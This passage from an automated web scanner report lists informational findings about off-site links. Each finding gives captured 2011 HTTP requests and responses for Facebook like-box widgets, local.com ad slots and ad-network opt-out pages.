<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sceena" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260935_100000022851602_6469469_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joshpool" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275555_777910353_3799524_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/santingo.munez" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275514_1542670092_2028795952_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.161. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.105.118
X-Cnection: close
Date: Sat, 17 Sep 2011 17:12:45 GMT
Content-Length: 13423

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000709442763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275024_100000709442763_3538361_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joshpool" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275555_777910353_3799524_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000716085860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274868_100000716085860_1952489414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.162. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.51
X-Cnection: close
Date: Sat, 17 Sep 2011 17:07:21 GMT
Content-Length: 13396

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000709442763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275024_100000709442763_3538361_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275687_100000454305252_764701829_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000716085860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274868_100000716085860_1952489414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sceena" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260935_100000022851602_6469469_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.163. http://www.kampyle.com/feedback_form/ff-feedback-form.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kampyle.com
Path:   /feedback_form/ff-feedback-form.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /feedback_form/ff-feedback-form.php?site_code=6941152&amp;lang=en&amp;form_id=56015&time_on_site=10&stats=k_button_js_revision%3D15643&url=http%3A%2F%2Fwww.local.com%2F&utmz=177062200.1316295499.1.1.utmcsr%3Dfakereferrerdominator.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName&utma=177062200.605228499.1316295499.1316295499.1316295499.1&utmv=null HTTP/1.1
Host: www.kampyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:57:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: FF_referrer_url=aHR0cDovL3d3dy5rYW1weWxlLmNvbS9mZWVkYmFja19mb3JtL2ZmLWZlZWRiYWNrLWZvcm0ucGhwP3NpdGVfY29kZT02OTQxMTUyJmFtcDtsYW5nPWVuJmFtcDtmb3JtX2lkPTU2MDE1JnRpbWVfb25fc2l0ZT0xMCZzdGF0cz1rX2J1dHRvbl9qc19yZXZpc2lvbiUzRDE1NjQzJnVybD1odHRwJTNBJTJGJTJGd3d3LmxvY2FsLmNvbSUyRiZ1dG16PTE3NzA2MjIwMC4xMzE2Mjk1NDk5LjEuMS51dG1jc3IlM0RmYWtlcmVmZXJyZXJkb21pbmF0b3IuY29tJTdDdXRtY2NuJTNEKHJlZmVycmFsKSU3Q3V0bWNtZCUzRHJlZmVycmFsJTdDdXRtY2N0JTNEJTJGcmVmZXJyZXJQYXRoTmFtZSZ1dG1hPTE3NzA2MjIwMC42MDUyMjg0OTkuMTMxNjI5NTQ5OS4xMzE2Mjk1NDk5LjEzMTYyOTU0OTkuMSZ1dG12PW51bGw%3D; expires=Sat, 17-Sep-2011 17:57:30 GMT; path=/
Set-Cookie: FF_caller_url=aHR0cDovL3d3dy5sb2NhbC5jb20v; expires=Sat, 17-Sep-2011 17:57:30 GMT; path=/
Vary: Accept-Encoding
Content-Length: 17861
Content-Type: text/html; charset=UTF-8

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<
...[SNIP]...
<meta name="viewport" content="width=430, initial-scale=0.55, maximum-scale=0.55"/>

<link rel="stylesheet" type="text/css" media="screen" href="http://d3a49zm9bincvs.cloudfront.net/css/1314193698/feedback-form.css" />
<script type="text/javascript" src="http://d3a49zm9bincvs.cloudfront.net/js/1315482464/feedback-form.js"></script>
<script type="text/javascript" src="http://d3a49zm9bincvs.cloudfront.net/js/1315482464/flash.js"></script>
...[SNIP]...
18.164. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316295496049&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 867
Date: Sat, 17 Sep 2011 16:55:17 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316295496049?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316295496049?" border="0" alt="" /></a>
...[SNIP]...
18.165. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 867
Date: Sat, 17 Sep 2011 16:28:42 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105?" border="0" alt="" /></a>
...[SNIP]...
18.166. http://www.local.com/dart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dart/?ag=True&p=locm.hp&sz=491x223&ord=1316295496049&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; session_start_time=1316295497762; k_visit=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 858
Date: Sat, 17 Sep 2011 16:55:22 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=491x223;kw=org;ord=1316295496049?" target="_blank"><img src="http://ad.doubleclick.net/ad/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=491x223;kw=org;ord=1316295496049?" border="0" alt="" /></a>
...[SNIP]...
18.167. http://www.mathtag.com/cgi-bin/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /cgi-bin/optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/optout?action=nai_oo_verify&nocache=558474596883042 HTTP/1.1
Host: www.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ts=1316277341; mt_mop=10008:1315139190|5:1315061038|9:1315272819|2:1315139242|13:1315426476|10002:1313678517|11:1315427469|4:1313678521; optout=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:21:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Sat, 17 Sep 2011 17:21:55 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, must-revalidate
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...
18.168. http://www.mathtag.com/cgi-bin/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /cgi-bin/optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/optout?action=nai_status&nocache=0.5597335 HTTP/1.1
Host: www.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1315103290; optout=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:48:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Sat, 17 Sep 2011 16:48:23 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, must-revalidate
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...
18.169. http://www.networkadvertising.org/yahoo_handler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /yahoo_handler

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /yahoo_handler?token=cVRuZVptSHJ4UjM- HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=IEJKFAKCLNPGOALBBGOPFGNN; __utma=1.1392774634.1315133979.1315416406.1316295035.3; __utmb=1; __utmc=1; __utmz=1.1316295035.3.3.utmccn=(referral)|utmcsr=networkadvertising.org|utmcct=/consumer/opt_out.asp|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:45:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...
18.170. http://www.pulse360.com/behavior/nai-opt-out.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pulse360.com
Path:   /behavior/nai-opt-out.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /behavior/nai-opt-out.html?status=1&nocache=0.1070724 HTTP/1.1
Host: www.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:46:00 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...
18.171. http://www.pulse360.com/behavior/nai-opt-out.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pulse360.com
Path:   /behavior/nai-opt-out.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /behavior/nai-opt-out.html?checkdrop=1 HTTP/1.1
Host: www.pulse360.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:39 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Connection: close
